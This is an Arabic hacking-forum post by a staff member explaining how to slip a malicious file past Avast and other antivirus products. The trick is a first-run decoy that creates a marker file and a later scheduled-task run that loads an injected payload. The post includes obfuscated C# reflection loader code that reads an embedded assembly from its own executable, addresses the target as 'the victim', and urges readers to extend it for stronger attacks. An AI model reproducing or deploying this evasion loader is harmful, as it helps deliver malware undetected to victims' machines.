16.12.2017 Bypass Avast And Avs New Idea


  • الـلـهـم انـصـر اخـوانـنـا الـمـسـلـمـيـن فـي بـورمـا وكـن مـعـهـم يـاربـاه يـاربـاه

BasharBachir

اللهم اغفر له وارحمه
طاقم الإدارة
28 أكتوبر 2018
1,568
2,963
1
حياكم الله ياشباب
من شهور جربت موضوعنا هون وقلت بنزله شي يوم بس افضى
الان موضوعنا هو باختصار شديد عشان
لو فهمت الفكرة رح تريحني وتريح نفسك
عندنا سورس ما بالسي شارب هذا السورس له مهمتين اساسيتين يقوم بهما
ورح نحط شرط لكل مهمة ان تحقق رح ينفذ مابداخله
اول شيء عند اول مرة تشغيل للملف من قبل الضحية
وفحص الافاست للملف رح يتحقق الملف من وجود ملف x في مسار ما نحنا منحدده
ان مش موجود رح ينفذ اول مهمة اساسية له واللي هيه
تشغيل مسج بوكس وانشاء ملف x
رح يعطيك الافاست انه مافي مشكلة بالنسبة للملف
عند ثاني مرة تشغيل واللي هيه بتتمثل باننا انشأنا مثل امهمة مجدولة للملف نفسه
بدل المسج بوكس مثلا
عند ثاني مرة تشغيل من قبل المهمة المجدولة
سيتاكد من وجود الملف x بالمسار اللي نحنا اخترناه ورح يشوف انه موجود
ويتحقق الشرط وينتقل للمهمة الثانية له اي للملف
واللي هيه تشغيل البايتات المحقونه بالملف
الان هنا مربط الفرس وهنا موضوعنا
تخيل ماذا سيحدث .؟
هل سيقوم الافاست باعادة فحص الملف .؟
هل سيظهر لك الدفاع الاستباقي ويفحص مايقوم به الملف .؟
الجواب لا لن يتحرك الافاست ابدا :15:
لان الملف لم يتغير لامساره ولااسمه ولاحجمه ولم يزيد او ينقص منه اي بت
ولم يتغير الهاش بالاصل فهو تعرف عليه انه تم فحصه والنتيجة سليم
وهذا عين مااريد ان اصل له بموضوعنا هنا
وهو تجنب ظهور نافذة الفحص الخاصة بالدفاع الاستباقي مرة اخرى
عند تنفيذ فانكشن اخرى من نفس الملف فقط لااكثر
شاهد الشرح هنا الفديو وستفهم كل شيء



هنا مثال عن الاكواد لازم انك تعدل عليها عشان تعمل استغلال اقوا
وكل الاكواد اللي ممكن تضيفها موجودة بمواضيعي السابقة

C#:
var exists = File.Exists("x");
              if (exists)
              {
                  Interaction.CallByName(Interaction.CallByName(Type.GetType(Bs(new byte[]
             { 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 65, 115, 115, 101, 109, 98, 108, 121}
               ))?.GetMethod(Bs(new byte[] { 76, 111, 97, 100 }),
           new[] { typeof(byte[]) })?.Invoke(null, new object[] { Hh((byte[])Type.GetType(Bs(new byte[] { 83, 121, 115, 116, 101, 109, 46, 73, 79, 46, 70, 105, 108, 101 }))?.
              GetMethod(Bs(new byte[] { 82, 101, 97, 100, 65, 108, 108, 66, 121, 116, 101, 115 }), new[] { typeof(string) })?.
          Invoke(null, new object[] { Application.ExecutablePath })) })
           ?? throw new InvalidOperationException(), Bs(new byte[] { 69, 110, 116, 114, 121, 80, 111, 105, 110, 116 }), CallType.Get)
         , Bs(new byte[] { 73, 110, 118, 111, 107, 101 }), CallType.Method, 1 - 1, null);
              }
              else
              {
                  MessageBox.Show("Hacked By Bashar Bachir");
              Type.GetType(Bs(new byte[] { 83, 121, 115, 116, 101, 109, 46, 73, 79, 46, 70, 105, 108, 101 }))?.
                  GetMethod(Bs(new byte[] { 87, 114, 105, 116, 101, 65, 108, 108, 84, 101, 120, 116 }), new[] { typeof(string), typeof(string) })
                      ?.Invoke(null, new object[] { "x", "" });
     }
      }
      static byte[] Hh(byte[] bb) { var test2 = new byte[12288]; Array.Copy(bb, 6656, test2, 0, test2.Length); return test2; }
      public static string Bs(byte[] bashar)
      {
          return System.Text.Encoding.ASCII.GetString(bashar);
      }




الفديو هنا
https://drive.google.com/file/d/1KRsofeqifP6r9u2M-qqhihj37b7DwHC6/view?usp=sharing


 

إخلاء مسؤلية

  • المنتدى غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به protection-tips غير مسؤول عن أي اتفاق تجاري أو تعاوني بين الأعضاء كل شخص يحمل مسئولية نفسه إتجاه مايقوم به من بيع وشراء وإتفاق وأعطاء معلومات موقعه التعليقات المنشورة لا تعبر عن رأي معهد المنتدى ولا نتحمل أي مسؤولية قانونية حيال ذلك (ويتحمل كاتبها مسؤولية النشر).).

الإنتقال السريع

User Menu

تابعنا على الفيسبوك